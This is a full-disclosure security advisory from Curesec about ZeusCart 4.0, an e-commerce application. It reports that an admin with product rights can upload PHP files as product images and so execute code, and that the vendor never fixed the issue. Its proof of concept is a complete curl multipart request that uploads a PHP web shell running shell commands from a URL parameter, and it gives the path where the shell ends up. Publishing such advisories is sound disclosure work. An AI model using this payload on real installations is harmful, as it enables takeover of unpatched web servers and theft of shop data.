ZeusCart 4.0 Code Execution
Posted on 17 September 2015
ZeusCart 4.0: Code Execution Security Advisory – Curesec Research Team 1. Introduction Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@zeuscart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description It is possible to upload PHP files when uploading an image for a new product. This leads to code execution once an attacker has gained access to the backend via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed. 3. Proof of Concept curl -i -s -k -X 'POST' -H 'Content-Type: multipart/form-data; boundary=--------1849257448' -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' --data-binary $'----------1849257448x0dx0aContent-Disposition: form-data; name="selcatgory[]"x0dx0ax0dx0a18x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="selcatgory[]"x0dx0ax0dx0a22x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="product_title"x0dx0ax0dx0atestx0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="desc"x0dx0ax0dx0adescx0d x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="sku"x0dx0ax0dx0a5x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="txtweight"x0dx0ax0dx0a5x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="status"x0dx0ax0dx0aonx0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="ufile[0]"; filename="test.php"x0dx0aContent-Type: application/x-phpx0dx0ax0dx0a<?php x0apassthru($_GET['x']);x0ax0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="price"x0dx0ax0dx0a6x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="msrp_org"x0dx0ax0dx0a6x0dx0a----------1849257448x0dx0aContent-Disposition: form-data; name="soh"x0dx0ax0dx0a7x0dx0a----------1849257448--x0dx0a' 'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert' The image will be located here: http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 08/13/2015 Informed Vendor about Issue (no reply) 09/07/2015 Reminded Vendor of release date (no reply) 09/14/2015 Disclosed to public 6. Blog Reference: http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html
